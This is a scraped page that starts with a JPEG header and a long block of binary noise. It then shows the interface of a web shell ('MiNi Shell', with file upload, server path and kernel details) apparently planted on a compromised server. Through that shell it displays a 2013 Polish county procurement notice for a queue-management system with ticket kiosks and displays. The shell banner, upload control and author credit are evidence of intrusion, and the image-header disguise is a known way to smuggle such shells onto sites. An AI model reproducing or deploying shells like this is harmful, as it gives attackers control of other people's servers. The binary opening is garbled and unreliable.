JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/235622-N-2013.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Zakup systemu do zarządzania obsługą interesantów</b><br>
<b>Numer ogłoszenia: 235622 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat  Tomaszowski , ul. Św. Antoniego 41, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 7242127, faks 44 725 28 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-tomaszowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup systemu do zarządzania obsługą interesantów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia
Przedmiot zamówienia:
I.	Wymagane główne elementy systemu:
Nazwa	Ilość
Oprogramowanie sterujące systemem obsługi interesanta.	1
Oprogramowanie stanowiskowe.	14
Automat biletowy	1
Wyświetlacz stanowiskowy	14
Wyświetlacz główny	1

II.	Cechy poszczególnych elementów systemu:
1.	Oprogramowanie sterujące systemem obsługi interesanta powinno cechować:
a)	modułowa budowa oraz wysoka skalowalność rozwiązania która zapewni możliwość dostosowania systemu do zmieniających się potrzeb Zamawiającego
b)	funkcjonuje jako niezależna aplikacja w sieci lokalnej.
c)	dystrybuuje informacje on-line i gromadzi dane statystyczne.
d)	zarządza ruchem i obsługą interesantów.
e)	umożliwia priorytetowanie dowolnych grup interesantów lub typów usług.
f)	zawiera bazę danych personelu oraz informacje o interesantach.
g)	umożliwia pracę z różnymi typami baz danych.
h)	dostęp do aplikacji poprzez przeglądarkę WWW oraz logowanie zabezpieczone hasłem.
i)	wbudowany Web serwer.
Cechy szczegółowe:
1)	Oprogramowanie winno posiadać moduł statystyczny i moduł planowania pracy stanowisk umożliwiający rozliczenie każdej minuty przeznaczonej na obsługę interesantów. Statystyki powinny obejmować zarówno aktualne informacje dotyczące obsługi interesantów jak i dane statystyczne z przeszłości. Dostęp do monitorowania pracy jak i do poszczególnych rodzajów raportów winne być definiowane przez Administratora.
2)	Ponadto oprogramowanie winno podawać aktualne informacje dotyczące obsługi  interesantów takie jak:
a)	- liczbę oczekujących w poszczególnych usługach,
b)	- czas oczekiwania każdego z interesantów,
c)	- czas obsługi każdego interesanta,
d)	- liczbę obsłużonych interesantów w grupie i na stanowisku,
e)	- informacje o zalogowanych pracownikach, itp.
3)	Umożliwia zdalne sterownie pracą stanowisk, wysyłanie komunikatów pomiędzy stanowiskami szefa sali obsługi i stanowiskami pracy.
4)	Pozwala na szybkie i łatwe redagowanie tekstów na biletach. Zmiany mogą być wprowadzane w dowolnej chwili bezpośrednio w miejscu funkcjonowania systemu lub zdalnie poprzez sieć LAN-WAN.
5)	Na biletach można drukować między innymi:
a)	- dowolne znaki graficzne (logo),
b)	- informację o przewidywanym czasie oczekiwania na obsługę,
c)	- informację o liczbie oczekujących interesantów,
d)	- datę, godzinę pobrania biletu,
e)	- dowolne hasła informacyjno-reklamowe.
6)	System umożliwia zastosowanie generatora mowy (głosowe przywoływanie interesantów - głos generowany przez komputer).
7)	System będzie umożliwiał limitowanie wydawanych biletów. Ustawianie limitów będzie możliwe zarówno wg warunku ilościowego jak i czasowego, zarówno w trybie ręcznym jak i automatycznym
8)	System pozwoli na automatycznie (programowane) przenoszenie interesantów pomiędzy pracownikami obsługującymi inny rodzaj kolejki w sytuacji braku interesantów w podstawowej kolejce.
9)	System pozwoli na umawianie wizyt poprzez Internet. Zakres możliwości umawiania wizyt (data, godzina, ilość dostępnych stanowisk) będzie w pełni konfigurowalny przez Administratora systemu.
10)	System umożliwi przesyłanie dowolnej informacji z systemu na zewnątrz np. na strony WWW lub publikowanie wybranych informacji (czasy oczekiwania, liczby oczekujących itp.)
2.	Oprogramowanie stanowiskowe powinno cechować możliwość:
1)	przywoływania kolejnego klienta,
2)	zamykania i otwierania stanowiska,
3)	logowania pracownika,
4)	rejestrację rodzaju wykonywanych operacji,
5)	przesyłanie i parkowanie interesantów,
6)	przesyłanie komunikatów.
7)	dane osoby rejestrującej
Ponadto oprogramowanie ma udostępnić pracownikowi szereg ważnych informacji np.: 
a)	liczbę interesantów oczekujących na obsługę,
b)	aktualny czas oczekiwania w obsługiwanej przez dane stanowisko w grupie,
c)	rzeczywisty czas oczekiwania ostatnio przywołanego klienta,
d)	liczbę pozostałych w automacie biletów, 
e)	aktualną godzinę, datę i inne.
Oprogramowanie stanowiskowe ma być uruchamiane z przeglądarki i nie wymagać specjalnej instalacji na stacji roboczej. Instalacja i konfiguracja wyglądu wszystkich  aplikacji na końcówkach odbywać się ma poprzez oprogramowanie sterujące. Wygląd oprogramowania stanowiskowego ma być w pełni konfigurowalny, ma istnieć możliwość stworzenia różnych wersji oprogramowania stanowiskowego dla różnych stanowisk obsługi.
3.	Automat biletowy
Automat biletowy ma być wykonany w formie uniemożliwiającej jego zniszczenie, wyposażony we własną stabilną podstawę oraz ma mieć możliwość obsługi nie mniej niż pięć typów kolejek. 
Obsługa automatu ma odbywać się poprzez wyświetlanie na 17 ekranie dotykowym informacji o dostępnych kolejkach/usługach oraz liczbie oczekujących w każdej kolejce i przewidywanym czasie oczekiwania dla każdej ze zdefiniowanych kolejek.
Automat ma być wyposażony we wbudowaną drukarkę  biletów.
Automat biletowy przed wydaniem biletu ma zidentyfikować Interesanta poprzez wprowadzenie numeru PESEL.
Automat ma umożliwić Interesantowi możliwość zarezerwowania wizyty na dowolny termin dostępny w kalendarzu. W przypadku zamówienia wizyty przez Internet potwierdzenie przybycia na zaplanowane spotkanie.
Dodatkowo oferta ma zawierać materiały eksploatacyjne do obsługi co najmniej 10 tysięcy biletów.
4.	Wyświetlacze stanowiskowe 
Wyświetlacze stanowiskowe mają mieć możliwość wyświetlania numeru interesanta który będzie aktualnie wzywany do obsługi. Wyświetlacz ma umożliwiać wyświetlanie 4 znaków, a w momencie przywołania kolejnego interesanta ma mrugać przez pewien czas wyświetlany numer.
5.	 Wyświetlacz główny
Wyświetlacze główne mają służyć przywoływaniu interesantów, poprzez wskazanie numeru interesanta oraz numeru wzywającego stanowiska. 
Wielkość wyświetlacza powinna być nie mniejsza niż 42.
III.	Rodzaje kolejek:
A - rejestracja pojazdów z kraju i z zagranicy (m.in. dopisanie współwłaściciela i zniesienie współwłasności; wyrejestrowanie złomowanych pojazdów, wymianę dowodów rejestracyjnych z powodu braku miejsca na wpis badania technicznego, wydanie tablic rejestracyjnych),
B - wydanie stałego dowodu rejestracyjnego po upływie czasowej rejestracji (zwrot zatrzymanego dowodu rejestracyjnego, wpis adnotacji w dowodzie rejestracyjnym i karcie pojazdu, zgłoszenie sprzedaży pojazdu)
C - wszystkie sprawy związane z uprawnieniami do kierowania pojazdami (prawa jazdy), karty parkingowe, transport. 
Wszystkie elementy zaproponowane do realizacji przedmiotu zamówienia mają stanowić w pełni kompletny i funkcjonujący zestaw gotowy do pracy bezpośrednio po instalacji bez potrzeby angażowania dodatkowych środków przez Zamawiającego.
Wykorzystane elementy mają zapewnić pełną współpracę w przypadku przyszłego rozszerzenia możliwości funkcjonalnych systemu zarówno poprzez zastosowanie dodatkowych stanowisk obsługi, kolejek, wyświetlaczy stanowiskowych, wyświetlaczy głównych czy automatów biletowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.51.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w celu wykazania spełnienia warunku wiedzy i doświadczenia Wykonawca musi wykazać, iż wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną dostawę polegającą na dostawie i instalacji systemu do zarządzania interesantami dla minimum 10 stanowisk obsługi interesanta, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikat CE</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-tomaszowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul.Św.Antoniego 41
97-200 Tomaszów Mazowiecki, pokój nr 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 10:00, miejsce: Starostwo Powiatowe
ul.Św.Antoniego 41
97-200 Tomaszów Mazowiecki, Kancelaria - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com